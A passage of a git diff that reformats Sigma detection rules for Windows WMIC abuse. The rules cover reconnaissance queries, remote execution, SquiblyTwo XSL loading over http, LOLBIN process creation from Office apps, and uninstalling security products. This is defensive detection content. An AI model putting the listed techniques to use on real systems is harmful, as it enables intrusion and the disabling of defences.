Detects execution of wmic utility with the "computersystem" flag in order to obtain information about the machine such as the domain, username, model, etc. references: - https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/ author: Nasreddine Bencherchali (Nextron Systems) @@ -20,10 +19,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \wmic.exe - - OriginalFileName: wmic.exe + - NewProcessName|endswith: \wmic.exe + - OriginalFileName: wmic.exe selection_cli: - CommandLine|contains: computersystem + CommandLine|contains: computersystem condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_wmic_recon_csproduct.yml b/sigma/builtin/process_creation/proc_creation_win_wmic_recon_csproduct.yml index 7fce34a46..13e220985 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wmic_recon_csproduct.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wmic_recon_csproduct.yml @@ -1,8 +1,7 @@ title: Hardware Model Reconnaissance Via Wmic.EXE id: 3e3ceccd-6c06-48b8-b5ff-ab1d25db8c1d status: test -description: Detects the execution of WMIC with the "csproduct" which is used to obtain - information such as hardware models and vendor information +description: Detects the execution of WMIC with the "csproduct" which is used to obtain information such as hardware models and vendor information references: - https://jonconwayuk.wordpress.com/2014/01/31/wmic-csproduct-using-wmi-to-identify-make-and-model-of-hardware/ - https://www.uptycs.com/blog/kuraystealer-a-bandit-using-discord-webhooks @@ -20,10 +19,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \wmic.exe - - OriginalFileName: wmic.exe + - NewProcessName|endswith: \wmic.exe + - OriginalFileName: wmic.exe selection_cli: - CommandLine|contains: csproduct + CommandLine|contains: csproduct condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_wmic_recon_group.yml b/sigma/builtin/process_creation/proc_creation_win_wmic_recon_group.yml index 80259b4e2..9929fc899 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wmic_recon_group.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wmic_recon_group.yml @@ -1,17 +1,11 @@ title: Local Groups Reconnaissance Via Wmic.EXE id: 164eda96-11b2-430b-85ff-6a265c15bf32 status: test -description: 'Detects the execution of "wmic" with the "group" flag. - +description: | + Detects the execution of "wmic" with the "group" flag. Adversaries may attempt to find local system groups and permission settings. - - The knowledge of local system permission groups can help adversaries determine - which groups exist and which users belong to a particular group. - - Adversaries may use this information to determine which users have elevated permissions, - such as the users found within the local administrators group. - - ' + The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. + Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md author: frack113 @@ -28,10 +22,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \wmic.exe - - OriginalFileName: wmic.exe + - NewProcessName|endswith: \wmic.exe + - OriginalFileName: wmic.exe selection_cli: - CommandLine|contains: ' group' + CommandLine|contains: ' group' condition: process_creation and (all of selection*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_wmic_recon_hotfix.yml b/sigma/builtin/process_creation/proc_creation_win_wmic_recon_hotfix.yml index 0b6f97677..3bccbce7a 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wmic_recon_hotfix.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wmic_recon_hotfix.yml @@ -1,9 +1,7 @@ title: Windows Hotfix Updates Reconnaissance Via Wmic.EXE id: dfd2fcb7-8bd5-4daa-b132-5adb61d6ad45 status: test -description: Detects the execution of wmic with the "qfe" flag in order to obtain - information about installed hotfix updates on the system. This is often used by - pentester and attacker enumeration scripts +description: Detects the execution of wmic with the "qfe" flag in order to obtain information about installed hotfix updates on the system. This is often used by pentester and attacker enumeration scripts references: - https://github.com/carlospolop/PEASS-ng/blob/fa0f2e17fbc1d86f1fd66338a40e665e7182501d/winPEAS/winPEASbat/winPEAS.bat - https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html @@ -21,10 +19,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - OriginalFileName: wmic.exe - - NewProcessName|endswith: \WMIC.exe + - OriginalFileName: wmic.exe + - NewProcessName|endswith: \WMIC.exe selection_cli: - CommandLine|contains: ' qfe' + CommandLine|contains: ' qfe' condition: process_creation and (all of selection*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_wmic_recon_process.yml b/sigma/builtin/process_creation/proc_creation_win_wmic_recon_process.yml index a33ec3149..b327c07fc 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wmic_recon_process.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wmic_recon_process.yml @@ -1,9 +1,7 @@ title: Process Reconnaissance Via Wmic.EXE id: 221b251a-357a-49a9-920a-271802777cc0 status: test -description: Detects the execution of "wmic" with the "process" flag, which adversary - might use to list processes running on the compromised host or list installed - software hotfixes and patches. +description: Detects the execution of "wmic" with the "process" flag, which adversary might use to list processes running on the compromised host or list installed software hotfixes and patches. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic @@ -21,12 +19,13 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \WMIC.exe - - OriginalFileName: wmic.exe + - NewProcessName|endswith: \WMIC.exe + - OriginalFileName: wmic.exe selection_cli: - CommandLine|contains: process + CommandLine|contains: process filter_main_creation: - CommandLine|contains|all: + CommandLine|contains|all: + # Rule id 526be59f-a573-4eea-b5f7-f0973207634d for `wmic process call create #{process_to_execute}` - call - create condition: process_creation and (all of selection* and not 1 of filter_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_wmic_recon_product.yml b/sigma/builtin/process_creation/proc_creation_win_wmic_recon_product.yml index b436c9b6e..16a91ad87 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wmic_recon_product.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wmic_recon_product.yml @@ -1,8 +1,7 @@ title: Potential Product Reconnaissance Via Wmic.EXE id: 15434e33-5027-4914-88d5-3d4145ec25a9 status: test -description: Detects the execution of WMIC in order to get a list of firewall and - antivirus products +description: Detects the execution of WMIC in order to get a list of firewall and antivirus products references: - https://thedfirreport.com/2023/03/06/2022-year-in-review/ - https://www.yeahhub.com/list-installed-programs-version-path-windows/ @@ -20,10 +19,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \wmic.exe - - OriginalFileName: wmic.exe + - NewProcessName|endswith: \wmic.exe + - OriginalFileName: wmic.exe selection_cli: - CommandLine|contains: Product + CommandLine|contains: Product condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_wmic_recon_product_class.yml b/sigma/builtin/process_creation/proc_creation_win_wmic_recon_product_class.yml index cc0d52e63..d97915d47 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wmic_recon_product_class.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wmic_recon_product_class.yml @@ -1,8 +1,7 @@ title: Potential Product Class Reconnaissance Via Wmic.EXE id: e568650b-5dcd-4658-8f34-ded0b1e13992 status: test -description: Detects the execution of WMIC in order to get a list of firewall and - antivirus products +description: Detects the execution of WMIC in order to get a list of firewall and antivirus products references: - https://github.com/albertzsigovits/malware-notes/blob/c820c7fea76cf76a861b28ebc77e06100e20ec29/Ransomware/Maze.md - https://www.hybrid-analysis.com/sample/4be06ecd234e2110bd615649fe4a6fa95403979acf889d7e45a78985eb50acf9?environmentId=1 @@ -21,10 +20,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \wmic.exe - - OriginalFileName: wmic.exe + - NewProcessName|endswith: \wmic.exe + - OriginalFileName: wmic.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - AntiVirusProduct - FirewallProduct condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_wmic_recon_service.yml b/sigma/builtin/process_creation/proc_creation_win_wmic_recon_service.yml index 873873979..0cbaa7e87 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wmic_recon_service.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wmic_recon_service.yml @@ -1,22 +1,14 @@ title: Service Reconnaissance Via Wmic.EXE id: 76f55eaa-d27f-4213-9d45-7b0e4b60bbae related: - - id: 68bcd73b-37ef-49cb-95fc-edc809730be6 - type: similar + - id: 68bcd73b-37ef-49cb-95fc-edc809730be6 + type: similar status: test -description: 'An adversary might use WMI to check if a certain remote service is running - on a remote device. - - When the test completes, a service information will be displayed on the screen - if it exists. - - A common feedback message is that "No instance(s) Available" if the service queried - is not running. - - A common error message is "Node - (provided IP or default) ERROR Description =The - RPC server is unavailable" if the provided remote host is unreachable - - ' +description: | + An adversary might use WMI to check if a certain remote service is running on a remote device. + When the test completes, a service information will be displayed on the screen if it exists. + A common feedback message is that "No instance(s) Available" if the service queried is not running. + A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the provided remote host is unreachable references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic @@ -33,10 +25,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \WMIC.exe - - OriginalFileName: wmic.exe + - NewProcessName|endswith: \WMIC.exe + - OriginalFileName: wmic.exe selection_cli: - CommandLine|contains: service + CommandLine|contains: service condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_wmic_recon_system_info_uncommon.yml b/sigma/builtin/process_creation/proc_creation_win_wmic_recon_system_info_uncommon.yml index be923913f..996b9e7aa 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wmic_recon_system_info_uncommon.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wmic_recon_system_info_uncommon.yml @@ -1,20 +1,14 @@ title: Uncommon System Information Discovery Via Wmic.EXE id: 9d5a1274-922a-49d0-87f3-8c653483b909 related: - - id: d85ecdd7-b855-4e6e-af59-d9c78b5b861e - type: derived + - id: d85ecdd7-b855-4e6e-af59-d9c78b5b861e + type: derived status: experimental -description: 'Detects the use of the WMI command-line (WMIC) utility to identify and - display various system information, - - including OS, CPU, GPU, and disk drive names; memory capacity; display resolution; - and baseboard, BIOS, - +description: | + Detects the use of the WMI command-line (WMIC) utility to identify and display various system information, + including OS, CPU, GPU, and disk drive names; memory capacity; display resolution; and baseboard, BIOS, and GPU driver products/versions. - Some of these commands were used by Aurora Stealer in late 2022/early 2023. - - ' references: - https://github.com/redcanaryco/atomic-red-team/blob/a2ccd19c37d0278b4ffa8583add3cf52060a5418/atomics/T1082/T1082.md#atomic-test-25---system-information-discovery-with-wmic - https://nwgat.ninja/getting-system-information-with-wmic-on-windows/ @@ -36,11 +30,11 @@ detection: EventID: 4688 Channel: Security selection_wmic: - - Description: WMI Commandline Utility - - OriginalFileName: wmic.exe - - NewProcessName|endswith: \WMIC.exe + - Description: WMI Commandline Utility + - OriginalFileName: wmic.exe + - NewProcessName|endswith: \WMIC.exe selection_commands: - CommandLine|contains: + CommandLine|contains: - LOGICALDISK get Name,Size,FreeSpace - os get Caption,OSArchitecture,Version condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_wmic_recon_unquoted_service_search.yml b/sigma/builtin/process_creation/proc_creation_win_wmic_recon_unquoted_service_search.yml index e8313186d..5850d69d9 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wmic_recon_unquoted_service_search.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wmic_recon_unquoted_service_search.yml @@ -1,13 +1,12 @@ title: Potential Unquoted Service Path Reconnaissance Via Wmic.EXE id: 68bcd73b-37ef-49cb-95fc-edc809730be6 related: - - id: 09658312-bc27-4a3b-91c5-e49ab9046d1b - type: similar - - id: 76f55eaa-d27f-4213-9d45-7b0e4b60bbae - type: similar + - id: 09658312-bc27-4a3b-91c5-e49ab9046d1b # PowerShell Variant + type: similar + - id: 76f55eaa-d27f-4213-9d45-7b0e4b60bbae + type: similar status: experimental -description: Detects known WMI recon method to look for unquoted service paths using - wmic. Often used by pentester and attacker enumeration scripts +description: Detects known WMI recon method to look for unquoted service paths using wmic. Often used by pentester and attacker enumeration scripts references: - https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py - https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1 @@ -26,10 +25,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - OriginalFileName: wmic.exe - - NewProcessName|endswith: \WMIC.exe + - OriginalFileName: wmic.exe + - NewProcessName|endswith: \WMIC.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' service get ' - name,displayname,pathname,startmode condition: process_creation and (all of selection*) diff --git a/sigma/builtin/process_creation/proc_creation_win_wmic_remote_execution.yml b/sigma/builtin/process_creation/proc_creation_win_wmic_remote_execution.yml index cf218f37d..f2d573ff5 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wmic_remote_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wmic_remote_execution.yml @@ -1,10 +1,10 @@ title: WMIC Remote Command Execution id: 7773b877-5abb-4a3e-b9c9-fd0369b59b00 related: - - id: e42af9df-d90b-4306-b7fb-05c863847ebd - type: obsoletes - - id: 09af397b-c5eb-4811-b2bb-08b3de464ebf - type: obsoletes + - id: e42af9df-d90b-4306-b7fb-05c863847ebd + type: obsoletes + - id: 09af397b-c5eb-4811-b2bb-08b3de464ebf + type: obsoletes status: test description: Detects the execution of WMIC to query information on a remote system references: @@ -23,12 +23,12 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \WMIC.exe - - OriginalFileName: wmic.exe + - NewProcessName|endswith: \WMIC.exe + - OriginalFileName: wmic.exe selection_cli: - CommandLine|contains: '/node:' + CommandLine|contains: '/node:' filter_localhost: - CommandLine|contains: + CommandLine|contains: - '/node:127.0.0.1 ' - '/node:localhost ' condition: process_creation and (all of selection_* and not 1 of filter_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_wmic_service_manipulation.yml b/sigma/builtin/process_creation/proc_creation_win_wmic_service_manipulation.yml index bb14250a5..9b42cfbff 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wmic_service_manipulation.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wmic_service_manipulation.yml @@ -18,13 +18,13 @@ detection: EventID: 4688 Channel: Security selection_img: - - OriginalFileName: wmic.exe - - NewProcessName|endswith: \WMIC.exe + - OriginalFileName: wmic.exe + - NewProcessName|endswith: \WMIC.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' service ' - ' call ' - CommandLine|contains: + CommandLine|contains: - stopservice - startservice condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_wmic_squiblytwo_bypass.yml b/sigma/builtin/process_creation/proc_creation_win_wmic_squiblytwo_bypass.yml index 5bc3d049e..3d2e92853 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wmic_squiblytwo_bypass.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wmic_squiblytwo_bypass.yml @@ -1,11 +1,10 @@ title: Potential SquiblyTwo Technique Execution id: 8d63dadf-b91b-4187-87b6-34a1114577ea status: test -description: Detects potential SquiblyTwo attack technique with possible renamed WMIC - via Imphash and OriginalFileName fields +description: Detects potential SquiblyTwo attack technique with possible renamed WMIC via Imphash and OriginalFileName fields references: - https://web.archive.org/web/20190209154607/https://subt0x11.blogspot.com/2018/04/wmicexe-whitelisting-bypass-hacking.html - - https://twitter.com/mattifestation/status/986280382042595328 + - https://twitter.com/mattifestation/status/986280382042595328 # Deleted - https://atomicredteam.io/defense-evasion/T1220/ - https://lolbas-project.github.io/lolbas/Binaries/Wmic/ author: Markus Neis, Florian Roth @@ -26,18 +25,18 @@ detection: EventID: 4688 Channel: Security selection_pe: - - NewProcessName|endswith: \wmic.exe - - OriginalFileName: wmic.exe - - Imphash: - - 1B1A3F43BF37B5BFE60751F2EE2F326E - - 37777A96245A3C74EB217308F3546F4C - - 9D87C9D67CE724033C0B40CC4CA1B206 - - Hashes|contains: - - IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E - - IMPHASH=37777A96245A3C74EB217308F3546F4C - - IMPHASH=9D87C9D67CE724033C0B40CC4CA1B206 + - NewProcessName|endswith: \wmic.exe + - OriginalFileName: wmic.exe + - Imphash: + - 1B1A3F43BF37B5BFE60751F2EE2F326E + - 37777A96245A3C74EB217308F3546F4C + - 9D87C9D67CE724033C0B40CC4CA1B206 + - Hashes|contains: # Sysmon field hashes contains all types + - IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E + - IMPHASH=37777A96245A3C74EB217308F3546F4C + - IMPHASH=9D87C9D67CE724033C0B40CC4CA1B206 selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - 'format:' - http condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_wmic_susp_execution_via_office_process.yml b/sigma/builtin/process_creation/proc_creation_win_wmic_susp_execution_via_office_process.yml index 464f0afe8..4517894f0 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wmic_susp_execution_via_office_process.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wmic_susp_execution_via_office_process.yml @@ -1,19 +1,18 @@ title: Suspicious WMIC Execution Via Office Process id: e1693bc8-7168-4eab-8718-cdcaa68a1738 related: - - id: 438025f9-5856-4663-83f7-52f878a70a50 - type: derived - - id: 518643ba-7d9c-4fa5-9f37-baed36059f6a - type: obsoletes - - id: 9d1c72f5-43f0-4da5-9320-648cf2099dd0 - type: obsoletes - - id: c0e1c3d5-4381-4f18-8145-2583f06a1fe5 - type: obsoletes - - id: 04f5363a-6bca-42ff-be70-0d28bf629ead - type: obsoletes + - id: 438025f9-5856-4663-83f7-52f878a70a50 + type: derived + - id: 518643ba-7d9c-4fa5-9f37-baed36059f6a + type: obsoletes + - id: 9d1c72f5-43f0-4da5-9320-648cf2099dd0 + type: obsoletes + - id: c0e1c3d5-4381-4f18-8145-2583f06a1fe5 + type: obsoletes + - id: 04f5363a-6bca-42ff-be70-0d28bf629ead + type: obsoletes status: test -description: Office application called wmic to proxye execution through a LOLBIN process. - This is often used to break suspicious parent-child chain (Office app spawns LOLBin). +description: Office application called wmic to proxye execution through a LOLBIN process. This is often used to break suspicious parent-child chain (Office app spawns LOLBin). references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml @@ -46,14 +45,15 @@ detection: - \wordpad.exe - \wordview.exe selection_wmic_img: - - NewProcessName|endswith: \wbem\WMIC.exe - - OriginalFileName: wmic.exe + - NewProcessName|endswith: \wbem\WMIC.exe + - OriginalFileName: wmic.exe selection_wmic_cli: - CommandLine|contains|all: + CommandLine|contains|all: - process - create - call - CommandLine|contains: + CommandLine|contains: + # Add more suspicious LOLBINs as you see fit - regsvr32 - rundll32 - msiexec diff --git a/sigma/builtin/process_creation/proc_creation_win_wmic_susp_process_creation.yml b/sigma/builtin/process_creation/proc_creation_win_wmic_susp_process_creation.yml index a62421950..4fe02bef0 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wmic_susp_process_creation.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wmic_susp_process_creation.yml @@ -1,11 +1,10 @@ title: Suspicious Process Created Via Wmic.EXE id: 3c89a1e8-0fba-449e-8f1b-8409d6267ec8 related: - - id: 526be59f-a573-4eea-b5f7-f0973207634d - type: derived + - id: 526be59f-a573-4eea-b5f7-f0973207634d # Generic + type: derived status: test -description: Detects WMIC executing "process call create" with suspicious calls to - processes such as "rundll32", "regsrv32", etc. +description: Detects WMIC executing "process call create" with suspicious calls to processes such as "rundll32", "regsrv32", etc. references: - https://thedfirreport.com/2020/10/08/ryuks-return/ - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker @@ -23,11 +22,12 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - 'process ' - 'call ' - 'create ' - CommandLine|contains: + CommandLine|contains: + # Add more susupicious paths and binaries as you see fit in your env - rundll32 - bitsadmin - regsvr32 diff --git a/sigma/builtin/process_creation/proc_creation_win_wmic_terminate_application.yml b/sigma/builtin/process_creation/proc_creation_win_wmic_terminate_application.yml index 3679314cd..791d35d7f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wmic_terminate_application.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wmic_terminate_application.yml @@ -1,11 +1,10 @@ title: Application Terminated Via Wmic.EXE id: 49d9671b-0a0a-4c09-8280-d215bfd30662 related: - - id: 847d5ff3-8a31-4737-a970-aeae8fe21765 - type: derived + - id: 847d5ff3-8a31-4737-a970-aeae8fe21765 # Uninstall Security Products + type: derived status: experimental -description: Detects calls to the "terminate" function via wmic in order to kill an - application +description: Detects calls to the "terminate" function via wmic in order to kill an application references: - https://cyble.com/blog/lockfile-ransomware-using-proxyshell-attack-to-deploy-ransomware/ - https://www.bitdefender.com/files/News/CaseStudies/study/377/Bitdefender-Whitepaper-WMI-creat4871-en-EN-GenericUse.pdf @@ -22,10 +21,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \WMIC.exe - - OriginalFileName: wmic.exe + - NewProcessName|endswith: \WMIC.exe + - OriginalFileName: wmic.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - call - terminate condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_wmic_uninstall_application.yml b/sigma/builtin/process_creation/proc_creation_win_wmic_uninstall_application.yml index cccf75edc..b1916a62d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wmic_uninstall_application.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wmic_uninstall_application.yml @@ -1,8 +1,8 @@ title: Application Removed Via Wmic.EXE id: b53317a0-8acf-4fd1-8de8-a5401e776b96 related: - - id: 847d5ff3-8a31-4737-a970-aeae8fe21765 - type: derived + - id: 847d5ff3-8a31-4737-a970-aeae8fe21765 # Uninstall Security Products + type: derived status: test description: Uninstall an application with wmic references: @@ -21,10 +21,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \WMIC.exe - - OriginalFileName: wmic.exe + - NewProcessName|endswith: \WMIC.exe + - OriginalFileName: wmic.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - call - uninstall condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_wmic_uninstall_security_products.yml b/sigma/builtin/process_creation/proc_creation_win_wmic_uninstall_security_products.yml index 0228f1536..f63dd5d2f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wmic_uninstall_security_products.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wmic_uninstall_security_products.yml @@ -1,11 +1,10 @@ title: Potential Tampering With Security Products Via WMIC id: 847d5ff3-8a31-4737-a970-aeae8fe21765 related: - - id: b53317a0-8acf-4fd1-8de8-a5401e776b96 - type: derived + - id: b53317a0-8acf-4fd1-8de8-a5401e776b96 # Generic Uninstall + type: derived status: test -description: Detects uninstallation or termination of security products using the - WMIC utility +description: Detects uninstallation or termination of security products using the WMIC utility references: - https://twitter.com/cglyer/status/1355171195654709249 - https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/ @@ -26,26 +25,26 @@ detection: EventID: 4688 Channel: Security selection_cli_1: - CommandLine|contains|all: + CommandLine|contains|all: - wmic - 'product where ' - call - uninstall - /nointeractive selection_cli_2: - CommandLine|contains|all: + CommandLine|contains|all: - wmic - 'caption like ' - CommandLine|contains: + CommandLine|contains: - call delete - call terminate selection_cli_3: - CommandLine|contains|all: + CommandLine|contains|all: - 'process ' - 'where ' - delete selection_product: - CommandLine|contains: + CommandLine|contains: - '%carbon%' - '%cylance%' - '%endpoint%' diff --git a/sigma/builtin/process_creation/proc_creation_win_wmic_xsl_script_processing.yml b/sigma/builtin/process_creation/proc_creation_win_wmic_xsl_script_processing.yml index eab4f5e90..cd19b314d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wmic_xsl_script_processing.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wmic_xsl_script_processing.yml @@ -1,16 +1,10 @@ title: XSL Script Execution Via WMIC.EXE id: 05c36dd6-79d6-4a9a-97da-3db20298ab2d status: test -description: 'Detects the execution of WMIC with the "format" flag to potentially - load XSL files. - - Adversaries abuse this functionality to execute arbitrary files while potentially - bypassing application whitelisting defenses. - - Extensible Stylesheet Language (XSL) files are commonly used to describe the processing - and rendering of data within XML files. - - ' +description: | + Detects the execution of WMIC with the "format" flag to potentially load XSL files. + Adversaries abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses. + Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1220/T1220.md author: Timur Zinniatullin, oscd.community, Swachchhanda Shrawan Poudel @@ -27,12 +21,12 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: - - /format - - -format - NewProcessName|endswith: \wmic.exe + CommandLine|contains: + - /format # wmic process list /FORMAT /? + - -format # wmic process list -FORMAT /? + NewProcessName|endswith: \wmic.exe filter_main_known_format: - CommandLine|contains: + CommandLine|contains: - Format:List - Format:htable - Format:hform @@ -44,8 +38,7 @@ detection: - Format:csv condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - - WMIC.exe FP depend on scripts and administrative methods used in the monitored - environment. + - WMIC.exe FP depend on scripts and administrative methods used in the monitored environment. - Static format arguments - https://petri.com/command-line-wmi-part-3 level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_wmiprvse_spawning_process.yml b/sigma/builtin/process_creation/proc_creation_win_wmiprvse_spawning_process.yml index ab86731fe..d968cd457 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wmiprvse_spawning_process.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wmiprvse_spawning_process.yml @@ -1,10 +1,10 @@ title: WmiPrvSE Spawned A Process id: d21374ff-f574-44a7-9998-4a8c8bf33d7d related: - - id: 8a582fe2-0882-4b89-a82a-da6b2dc32937 - type: similar - - id: 692f0bec-83ba-4d04-af7e-e884a96059b6 - type: similar + - id: 8a582fe2-0882-4b89-a82a-da6b2dc32937 + type: similar + - id: 692f0bec-83ba-4d04-af7e-e884a96059b6 + type: similar status: stable description: Detects WmiPrvSE spawning a process references: @@ -26,18 +26,18 @@ detection: ParentProcessName|endswith: \WmiPrvSe.exe filter_logonid: SubjectLogonId: - - '0x3e7' - - 'null' + - '0x3e7' # LUID 999 for SYSTEM + - 'null' # too many false positives filter_system_user: - SubjectUserName|contains: + SubjectUserName|contains: # covers many language settings - AUTHORI - AUTORI filter_wmiprvse: - NewProcessName|endswith: \WmiPrvSE.exe + NewProcessName|endswith: \WmiPrvSE.exe filter_werfault: - NewProcessName|endswith: \WerFault.exe - filter_null: - SubjectLogonId: null + NewProcessName|endswith: \WerFault.exe + filter_null: # some backends need the null value in a separate expression + SubjectLogonId: condition: process_creation and (selection and not 1 of filter_*) falsepositives: - False positives are expected (e.g. in environments where WinRM is used legitimately) diff --git a/sigma/builtin/process_creation/proc_creation_win_wmiprvse_spawns_powershell.yml b/sigma/builtin/process_creation/proc_creation_win_wmiprvse_spawns_powershell.yml index 84b89f537..9293e08ff 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wmiprvse_spawns_powershell.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wmiprvse_spawns_powershell.yml @@ -1,13 +1,12 @@ title: Potential WMI Lateral Movement WmiPrvSE Spawned PowerShell id: 692f0bec-83ba-4d04-af7e-e884a96059b6 related: - - id: 8a582fe2-0882-4b89-a82a-da6b2dc32937 - type: similar - - id: d21374ff-f574-44a7-9998-4a8c8bf33d7d - type: similar + - id: 8a582fe2-0882-4b89-a82a-da6b2dc32937 + type: similar + - id: d21374ff-f574-44a7-9998-4a8c8bf33d7d + type: similar status: stable -description: Detects Powershell as a child of the WmiPrvSE process. Which could be - a sign of lateral movement via WMI. +description: Detects Powershell as a child of the WmiPrvSE process. Which could be a sign of lateral movement via WMI. references: - https://any.run/report/68bc255f9b0db6a0d30a8f2dadfbee3256acfe12497bf93943bc1eab0735e45e/a2385d6f-34f7-403c-90d3-b1f9d2a90a5e author: Markus Neis @Karneades @@ -27,12 +26,12 @@ detection: selection_parent: ParentProcessName|endswith: \WmiPrvSE.exe selection_img: - - NewProcessName|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll condition: process_creation and (all of selection_*) falsepositives: - AppvClient diff --git a/sigma/builtin/process_creation/proc_creation_win_wmiprvse_susp_child_processes.yml b/sigma/builtin/process_creation/proc_creation_win_wmiprvse_susp_child_processes.yml index 